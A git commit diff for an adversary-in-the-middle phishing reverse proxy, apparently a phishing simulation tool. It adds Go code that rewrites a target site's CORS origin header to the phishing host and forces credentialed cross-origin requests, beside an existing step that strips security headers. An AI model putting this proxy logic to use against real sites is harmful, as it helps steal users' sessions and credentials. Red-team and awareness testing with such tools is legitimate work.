fix add cors to sessionless aitm requests

Signed-off-by: Ronni Skansing <ronni@phishing.club>
This commit is contained in:
Ronni Skansing
2026-07-04 23:28:40 +02:00
parent 563d9daf9d
commit 4cf304a2d5
+20
View File
@@ -1061,6 +1061,7 @@ func (m *ProxyHandler) processResponseWithoutSessionContext(resp *http.Response,
// apply basic response processing
m.removeSecurityHeaders(resp)
m.rewriteCORSHeaderWithoutSession(resp, config)
m.rewriteLocationHeaderWithoutSession(resp, config)
m.applyCustomResponseHeaderReplacementsWithoutSession(resp, config, reqCtx.TargetDomain, reqCtx.ProxyConfig)
m.rewriteResponseBodyWithoutSessionContext(resp, reqCtx, config)
@@ -1155,6 +1156,25 @@ func (m *ProxyHandler) rewriteLocationHeaderWithoutSession(resp *http.Response,
}
}
// rewriteCORSHeaderWithoutSession maps the Access-Control-Allow-Origin host from
// the target to its phishing equivalent so cross origin requests that carry no
// proxy session still see an origin that matches the phishing host. A wildcard
// origin needs no rewrite.
func (m *ProxyHandler) rewriteCORSHeaderWithoutSession(resp *http.Response, config map[string]service.ProxyServiceDomainConfig) {
allowOrigin := resp.Header.Get("Access-Control-Allow-Origin")
if allowOrigin == "" || allowOrigin == "*" {
return
}
if oURL, err := url.Parse(allowOrigin); err == nil {
if phishHost := m.replaceHostWithPhished(oURL.Host, config); phishHost != "" {
oURL.Host = phishHost
resp.Header.Set("Access-Control-Allow-Origin", oURL.String())
}
}
resp.Header.Set("Access-Control-Allow-Credentials", "true")
}
func (m *ProxyHandler) rewriteResponseBodyWithoutSessionContext(resp *http.Response, reqCtx *RequestContext, configMap map[string]service.ProxyServiceDomainConfig) {
contentType := resp.Header.Get("Content-Type")
if !m.shouldProcessContent(contentType) {